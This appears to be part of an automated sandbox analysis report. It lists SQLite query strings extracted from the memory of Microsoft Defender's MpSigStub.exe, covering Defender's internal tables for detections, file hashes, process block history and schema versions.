Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;|
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
